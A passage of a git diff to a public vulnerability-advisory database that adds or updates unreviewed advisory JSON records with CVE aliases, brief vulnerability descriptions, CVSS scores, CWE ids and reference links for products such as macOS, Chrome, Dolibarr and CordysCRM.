14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, iOS 26.3 and iPadOS 26.3. An app may be able to bypass certain Privacy preferences.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-g32q-3228-m26p/GHSA-g32q-3228-m26p.json b/advisories/unreviewed/2026/02/GHSA-g32q-3228-m26p/GHSA-g32q-3228-m26p.json index ed356d39b51f1..284c388303220 100644 --- a/advisories/unreviewed/2026/02/GHSA-g32q-3228-m26p/GHSA-g32q-3228-m26p.json +++ b/advisories/unreviewed/2026/02/GHSA-g32q-3228-m26p/GHSA-g32q-3228-m26p.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-g32q-3228-m26p", - "modified": "2026-02-12T00:31:03Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2025-43417" ], "details": "A path handling issue was addressed with improved logic. This issue is fixed in macOS Sonoma 14.8.4. An app may be able to access user-sensitive data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:02Z" diff --git a/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json b/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json new file mode 100644 index 0000000000000..2f46e7efbfcc7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ghfm-hghj-9j75", + "modified": "2026-02-12T18:30:24Z", + "published": "2026-02-12T18:30:24Z", + "aliases": [ + "CVE-2025-69806" + ], + "details": "p2r3 bareiron commit: 8e4d4020d contains an Out-of-bounds Read, which allows unauthenticated remote attackers to get relative information leakage via a packet sent to the server", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69806" + }, + { + "type": "WEB", + "url": "https://github.com/p2r3/bareiron" + }, + { + "type": "WEB", + "url": "https://github.com/vmpr0be/bareiron-vr/blob/main/CVE-2025-69806.md" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gvjm-pmwp-75mw/GHSA-gvjm-pmwp-75mw.json b/advisories/unreviewed/2026/02/GHSA-gvjm-pmwp-75mw/GHSA-gvjm-pmwp-75mw.json index 9effa6d88e9f8..9050944207c6a 100644 --- a/advisories/unreviewed/2026/02/GHSA-gvjm-pmwp-75mw/GHSA-gvjm-pmwp-75mw.json +++ b/advisories/unreviewed/2026/02/GHSA-gvjm-pmwp-75mw/GHSA-gvjm-pmwp-75mw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-gvjm-pmwp-75mw", - "modified": "2026-02-11T21:30:40Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T21:30:40Z", "aliases": [ "CVE-2026-2317" ], "details": "Inappropriate implementation in Animation in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T19:15:51Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h9c8-jr46-gp7p/GHSA-h9c8-jr46-gp7p.json b/advisories/unreviewed/2026/02/GHSA-h9c8-jr46-gp7p/GHSA-h9c8-jr46-gp7p.json index 7ae5f78f42d00..1c8ffd02a35e2 100644 --- a/advisories/unreviewed/2026/02/GHSA-h9c8-jr46-gp7p/GHSA-h9c8-jr46-gp7p.json +++ b/advisories/unreviewed/2026/02/GHSA-h9c8-jr46-gp7p/GHSA-h9c8-jr46-gp7p.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h9c8-jr46-gp7p", - "modified": "2026-02-11T21:30:42Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T21:30:42Z", "aliases": [ "CVE-2024-50620" ], "details": "Unrestricted Upload of File with Dangerous Type vulnerabilities exist in the rich text editor and document manage components in CIPPlanner CIPAce before 9.17. An authorized user can upload executable files when inserting images in the rich text editor, and upload executable files when uploading files on the document management page. Those executables can be executed if they are not stored in a shared directory or if the storage directory has executed permissions.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T21:16:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-hfj8-gv3c-fx7w/GHSA-hfj8-gv3c-fx7w.json b/advisories/unreviewed/2026/02/GHSA-hfj8-gv3c-fx7w/GHSA-hfj8-gv3c-fx7w.json new file mode 100644 index 0000000000000..e36ed950ee2dd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hfj8-gv3c-fx7w/GHSA-hfj8-gv3c-fx7w.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hfj8-gv3c-fx7w", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T18:30:23Z", + "aliases": [ + "CVE-2025-69634" + ], + "details": "Cross Site Request Forgery vulnerability in Dolibarr ERP & CRM v.22.0.9 allows a remote attacker to escalate privileges via the notes field in perms.php", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69634" + }, + { + "type": "WEB", + "url": "https://github.com/simone97212/DolibarrVuln" + }, + { + "type": "WEB", + "url": "https://github.com/simone97212/vuln-research/tree/main/CVE-2025-69634" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T16:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hfmq-6wjv-c7r3/GHSA-hfmq-6wjv-c7r3.json b/advisories/unreviewed/2026/02/GHSA-hfmq-6wjv-c7r3/GHSA-hfmq-6wjv-c7r3.json index 77bd821965684..f2002fe5b2b12 100644 --- a/advisories/unreviewed/2026/02/GHSA-hfmq-6wjv-c7r3/GHSA-hfmq-6wjv-c7r3.json +++ b/advisories/unreviewed/2026/02/GHSA-hfmq-6wjv-c7r3/GHSA-hfmq-6wjv-c7r3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hfmq-6wjv-c7r3", - "modified": "2026-02-11T18:31:31Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T18:31:31Z", "aliases": [ "CVE-2025-70085" ], "details": "An issue was discovered in OpenSatKit 2.2.1. The EventErrStr buffer has a fixed size of 256 bytes. The code uses sprintf to format two filenames (Source1Filename and the string returned by FileUtil_FileStateStr) into this buffer without any length checking and without using bounded format specifiers such as %.*s. If the filename length approaches OS_MAX_PATH_LEN (commonly 64-256 bytes), the combined formatted string together with constant text can exceed 256 bytes, resulting in a stack buffer overflow. Such unsafe sprintf calls are scattered across multiple functions in file.c, including FILE_ConcatenateCmd() and ConcatenateFiles(), all of which fail to validate the output length.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-121" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T18:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-hjj6-wmh2-qhwj/GHSA-hjj6-wmh2-qhwj.json b/advisories/unreviewed/2026/02/GHSA-hjj6-wmh2-qhwj/GHSA-hjj6-wmh2-qhwj.json index 618359bd937ba..24cfe4c9d7bdf 100644 --- a/advisories/unreviewed/2026/02/GHSA-hjj6-wmh2-qhwj/GHSA-hjj6-wmh2-qhwj.json +++ b/advisories/unreviewed/2026/02/GHSA-hjj6-wmh2-qhwj/GHSA-hjj6-wmh2-qhwj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hjj6-wmh2-qhwj", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20635" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. Processing maliciously crafted web content may lead to an unexpected process crash.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -44,8 +49,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-j33g-vgfm-6pxv/GHSA-j33g-vgfm-6pxv.json b/advisories/unreviewed/2026/02/GHSA-j33g-vgfm-6pxv/GHSA-j33g-vgfm-6pxv.json new file mode 100644 index 0000000000000..35b4b4aead8b0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j33g-vgfm-6pxv/GHSA-j33g-vgfm-6pxv.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j33g-vgfm-6pxv", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T18:30:23Z", + "aliases": [ + "CVE-2025-61880" + ], + "details": "In Infoblox NIOS through 9.0.7, insecure deserialization can result in remote code execution.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61880" + }, + { + "type": "WEB", + "url": "https://infoblox.com" + }, + { + "type": "WEB", + "url": "https://support.infoblox.com/s/article/CVE-2025-61879-and-CVE-2025-61880" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T17:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j8xr-3xqm-72rh/GHSA-j8xr-3xqm-72rh.json b/advisories/unreviewed/2026/02/GHSA-j8xr-3xqm-72rh/GHSA-j8xr-3xqm-72rh.json new file mode 100644 index 0000000000000..170b41c6e6673 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j8xr-3xqm-72rh/GHSA-j8xr-3xqm-72rh.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j8xr-3xqm-72rh", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T18:30:23Z", + "aliases": [ + "CVE-2025-54756" + ], + "details": "BrightSign players running BrightSign OS series 4 prior to v8.5.53.1 or \nseries 5 prior to v9.0.166 use a default password that is guessable with\n knowledge of the device information. The latest release fixes this \nissue for new installations; users of old installations are encouraged \nto change all default passwords.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54756" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-126-03.json" + }, + { + "type": "WEB", + "url": "https://www.brightsign.biz/resources/software-downloads" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-126-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1392" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T17:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m4mv-q6m2-24j4/GHSA-m4mv-q6m2-24j4.json b/advisories/unreviewed/2026/02/GHSA-m4mv-q6m2-24j4/GHSA-m4mv-q6m2-24j4.json index 613d8a1b752a2..5fb5bd9626563 100644 --- a/advisories/unreviewed/2026/02/GHSA-m4mv-q6m2-24j4/GHSA-m4mv-q6m2-24j4.json +++ b/advisories/unreviewed/2026/02/GHSA-m4mv-q6m2-24j4/GHSA-m4mv-q6m2-24j4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m4mv-q6m2-24j4", - "modified": "2026-02-12T00:31:03Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2025-46302" ], "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:02Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mg2x-vmw2-xm7h/GHSA-mg2x-vmw2-xm7h.json b/advisories/unreviewed/2026/02/GHSA-mg2x-vmw2-xm7h/GHSA-mg2x-vmw2-xm7h.json index 11998ff6948d1..79c5622885b67 100644 --- a/advisories/unreviewed/2026/02/GHSA-mg2x-vmw2-xm7h/GHSA-mg2x-vmw2-xm7h.json +++ b/advisories/unreviewed/2026/02/GHSA-mg2x-vmw2-xm7h/GHSA-mg2x-vmw2-xm7h.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mg2x-vmw2-xm7h", - "modified": "2026-02-12T00:31:03Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2025-46304" ], "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:02Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mw3g-2cmq-pj57/GHSA-mw3g-2cmq-pj57.json b/advisories/unreviewed/2026/02/GHSA-mw3g-2cmq-pj57/GHSA-mw3g-2cmq-pj57.json index d0e891bea5843..9ab0190f5c96b 100644 --- a/advisories/unreviewed/2026/02/GHSA-mw3g-2cmq-pj57/GHSA-mw3g-2cmq-pj57.json +++ b/advisories/unreviewed/2026/02/GHSA-mw3g-2cmq-pj57/GHSA-mw3g-2cmq-pj57.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mw3g-2cmq-pj57", - "modified": "2026-02-11T21:30:40Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T21:30:40Z", "aliases": [ "CVE-2024-26480" ], "details": "An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the admin parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -33,7 +38,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T20:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json b/advisories/unreviewed/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json new file mode 100644 index 0000000000000..85f352eadef4a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p773-8mf4-rjm5/GHSA-p773-8mf4-rjm5.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p773-8mf4-rjm5", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T18:30:23Z", + "aliases": [ + "CVE-2025-56647" + ], + "details": "npm @farmfe/core before 1.7.6 is Missing Origin Validation in WebSocket. The development (hot module reloading) server does not validate origin when connecting to a WebSocket client. This allows attackers to surveil developers running Farm who visit their webpage and steal source code that is leaked by the WebSocket server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-56647" + }, + { + "type": "WEB", + "url": "https://github.com/farm-fe/farm/issues/2168" + }, + { + "type": "WEB", + "url": "https://github.com/farm-fe/farm/commit/83342ef06e0aea37270950fd8c930422c4df0679" + }, + { + "type": "WEB", + "url": "https://gist.github.com/R4356th/d4372c6f83275d583c180c0e7d7332af" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1385" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T16:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json new file mode 100644 index 0000000000000..2d40cf4763f91 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pc38-57g8-39gg/GHSA-pc38-57g8-39gg.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc38-57g8-39gg", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T18:30:23Z", + "aliases": [ + "CVE-2025-69752" + ], + "details": "An issue in the \"My Details\" user profile functionality of Ideagen Q-Pulse 7.1.0.32 allows an authenticated user to view other users' profile information by modifying the objectKey HTTP parameter in the My Details page URL.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69752" + }, + { + "type": "WEB", + "url": "https://github.com/brtsec/public-advisories/tree/main/advisories/CVE-2025-69752" + }, + { + "type": "WEB", + "url": "http://ideagen.com" + }, + { + "type": "WEB", + "url": "http://q-pulse.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T16:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pcm2-mwj5-74rq/GHSA-pcm2-mwj5-74rq.json b/advisories/unreviewed/2026/02/GHSA-pcm2-mwj5-74rq/GHSA-pcm2-mwj5-74rq.json index 599cc5a4654ff..0c849f487f17c 100644 --- a/advisories/unreviewed/2026/02/GHSA-pcm2-mwj5-74rq/GHSA-pcm2-mwj5-74rq.json +++ b/advisories/unreviewed/2026/02/GHSA-pcm2-mwj5-74rq/GHSA-pcm2-mwj5-74rq.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-pj3r-q6m4-wfcw/GHSA-pj3r-q6m4-wfcw.json b/advisories/unreviewed/2026/02/GHSA-pj3r-q6m4-wfcw/GHSA-pj3r-q6m4-wfcw.json new file mode 100644 index 0000000000000..294b759e004fb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pj3r-q6m4-wfcw/GHSA-pj3r-q6m4-wfcw.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj3r-q6m4-wfcw", + "modified": "2026-02-12T18:30:24Z", + "published": "2026-02-12T18:30:24Z", + "aliases": [ + "CVE-2025-52533" + ], + "details": "Improper Access Control in an on-chip debug interface could allow a privileged attacker to enable a debug interface and potentially compromise data confidentiality or integrity.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52533" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3023.html" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4013.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1191" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pr6p-6x97-5c59/GHSA-pr6p-6x97-5c59.json b/advisories/unreviewed/2026/02/GHSA-pr6p-6x97-5c59/GHSA-pr6p-6x97-5c59.json index 188f29d649676..0de0091afbe14 100644 --- a/advisories/unreviewed/2026/02/GHSA-pr6p-6x97-5c59/GHSA-pr6p-6x97-5c59.json +++ b/advisories/unreviewed/2026/02/GHSA-pr6p-6x97-5c59/GHSA-pr6p-6x97-5c59.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pr6p-6x97-5c59", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2025-46310" ], "details": "This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.7.4, macOS Sonoma 14.8.4. An attacker with root privileges may be able to delete protected system files.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:03Z" diff --git a/advisories/unreviewed/2026/02/GHSA-q6v4-fwc8-3mpc/GHSA-q6v4-fwc8-3mpc.json b/advisories/unreviewed/2026/02/GHSA-q6v4-fwc8-3mpc/GHSA-q6v4-fwc8-3mpc.json index 9c0c33dda1143..91a9ca8f21aed 100644 --- a/advisories/unreviewed/2026/02/GHSA-q6v4-fwc8-3mpc/GHSA-q6v4-fwc8-3mpc.json +++ b/advisories/unreviewed/2026/02/GHSA-q6v4-fwc8-3mpc/GHSA-q6v4-fwc8-3mpc.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q6v4-fwc8-3mpc", - "modified": "2026-02-05T18:30:32Z", + "modified": "2026-02-12T18:30:20Z", "published": "2026-02-05T18:30:32Z", "aliases": [ "CVE-2025-15551" ], "details": "The response coming from TP-Link Archer MR200 v5.2, C20 v6, TL-WR850N v3, and TL-WR845N v4 for any request is getting executed by the JavaScript function like eval directly without any check. Attackers can exploit this vulnerability via a Man-in-the-Middle (MitM) attack to execute JavaScript code on the router's admin web portal without the user's permission or knowledge.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-qg96-wxg3-3x3h/GHSA-qg96-wxg3-3x3h.json b/advisories/unreviewed/2026/02/GHSA-qg96-wxg3-3x3h/GHSA-qg96-wxg3-3x3h.json index e5f141a6c8ccc..ed93c7c35f468 100644 --- a/advisories/unreviewed/2026/02/GHSA-qg96-wxg3-3x3h/GHSA-qg96-wxg3-3x3h.json +++ b/advisories/unreviewed/2026/02/GHSA-qg96-wxg3-3x3h/GHSA-qg96-wxg3-3x3h.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qg96-wxg3-3x3h", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20625" ], "details": "A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4, visionOS 26.3. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json b/advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json new file mode 100644 index 0000000000000..77645a39946e4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qr83-6r38-ch55", + "modified": "2026-02-12T18:30:24Z", + "published": "2026-02-12T18:30:24Z", + "aliases": [ + "CVE-2025-70981" + ], + "details": "CordysCRM 1.4.1 is vulnerable to SQL Injection in the employee list query interface (/user/list) via the departmentIds parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70981" + }, + { + "type": "WEB", + "url": "https://github.com/Tomikun2/SQL-Injection-in-CordysCRM/blob/main/README.md" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r28c-wjwj-4xgv/GHSA-r28c-wjwj-4xgv.json b/advisories/unreviewed/2026/02/GHSA-r28c-wjwj-4xgv/GHSA-r28c-wjwj-4xgv.json index 344caa9c84697..7b987ebbf02ee 100644 --- a/advisories/unreviewed/2026/02/GHSA-r28c-wjwj-4xgv/GHSA-r28c-wjwj-4xgv.json +++ b/advisories/unreviewed/2026/02/GHSA-r28c-wjwj-4xgv/GHSA-r28c-wjwj-4xgv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r28c-wjwj-4xgv", - "modified": 